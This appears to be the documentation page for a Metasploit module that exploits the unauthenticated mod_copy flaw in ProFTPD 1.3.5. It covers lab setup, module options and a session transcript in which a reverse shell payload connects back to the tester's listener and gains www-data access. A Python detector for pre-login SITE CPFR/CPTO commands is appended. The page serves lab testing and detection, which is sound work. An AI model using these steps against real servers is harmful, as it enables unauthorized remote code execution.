## Vulnerable Application

This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user.
By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

## Installation Steps

Download and build:

```sh
sudo apt install gcc make
wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz
tar zxvf proftpd-1.3.5.tar.gz
cd proftpd-1.3.5
./configure --with-modules=mod_copy
make
```

Run ProFTPD using the sample default configuration file (in foreground with `-n` flag for testing):

```
sudo ./proftpd -n -c "`pwd`/sample-configurations/basic.conf"
```

Set up a web server with a world-writable directory:

```
sudo apt install php apache2
sudo mkdir /var/www/html/test
sudo chmod 777 /var/www/html/test
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/unix/ftp/proftpd_modcopy_exec`
1. Do: `set rhosts `
1. Do: `set rport_ftp `
1. Do: `set tmppath `
1. Do: `set sitepath `
1. Do: `run`
1. You should get a new session.

## Options

### RPORT_FTP

FTP port (default: `21`)

### TMPPATH

Absolute writable path (default: `/tmp`)

### SITEPATH

Absolute writable website path (default: `/var/www`)

## Scenarios

### ProFTPD 1.3.5 on Ubuntu 22.04

```
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.200.158
rhosts => 192.168.200.158
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > check
[*] 192.168.200.158:80 - The target appears to be vulnerable.
192.168.200.158:21 - Unauthenticated SITE CPFR command was successful
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html/test
sitepath => /var/www/html/test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
targeturi => /test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.158:80 - 192.168.200.158:21 - Connected to FTP server
[*] 192.168.200.158:80 - 192.168.200.158:21 - Sending copy commands to FTP server
[*] 192.168.200.158:80 - Executing PHP payload /test/EbzQzU.php
[+] 192.168.200.158:80 - Deleted /var/www/html/test/EbzQzU.php
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.158:46352) at 2023-03-19 00:22:49 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/test
```
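
A detection-side view of the behaviour described under Vulnerable Application, added here as an example that is not part of the module or its documentation: it walks an FTP control-channel transcript and reports every SITE CPFR/CPTO command sent before a successful login (reply 230), recording whether the server accepted it. The transcript format, the function name `find_unauth_copy` and the sample lines are assumptions constructed for illustration.

```python
import re

# Constructed sample: FTP control-channel lines as (direction, text) pairs,
# "C" = client to server, "S" = server to client. Not captured traffic.
SAMPLE = [
    ("S", "220 ProFTPD 1.3.5 Server ready"),
    ("C", "SITE CPFR /proc/self/cmdline"),
    ("S", "350 File or directory exists, ready for destination name"),
    ("C", "SITE CPTO /tmp/.example"),
    ("S", "250 Copy successful"),
    ("C", "USER alice"),
    ("S", "331 Password required for alice"),
    ("C", "PASS ********"),
    ("S", "230 User alice logged in"),
    ("C", "SITE CPFR /home/alice/a.txt"),
    ("S", "350 File or directory exists, ready for destination name"),
]

SITE_COPY = re.compile(r"^SITE\s+(CPFR|CPTO)\s+(.+)$", re.IGNORECASE)

def find_unauth_copy(transcript):
    """Return one finding per SITE CPFR/CPTO sent before a 230 login reply."""
    authenticated = False
    pending = None  # finding still waiting for its server reply
    findings = []
    for direction, text in transcript:
        text = text.strip()
        if direction == "S":
            code = text[:3]
            if code == "230":
                authenticated = True
            if pending is not None and code.isdigit():
                # A 2xx/3xx reply means the server honoured the command.
                pending["accepted"] = code[0] in "23"
                pending = None
            continue
        m = SITE_COPY.match(text)
        if m and not authenticated:
            pending = {
                "verb": m.group(1).upper(),
                "path": m.group(2),
                "procfs": m.group(2).startswith("/proc/"),
                "accepted": False,
            }
            findings.append(pending)
        else:
            pending = None  # any other client command clears the wait
    return findings
```

A finding with `accepted` set to true on a pre-login session is the signal that matters; `procfs` highlights the `/proc/self/cmdline` source the description above relies on.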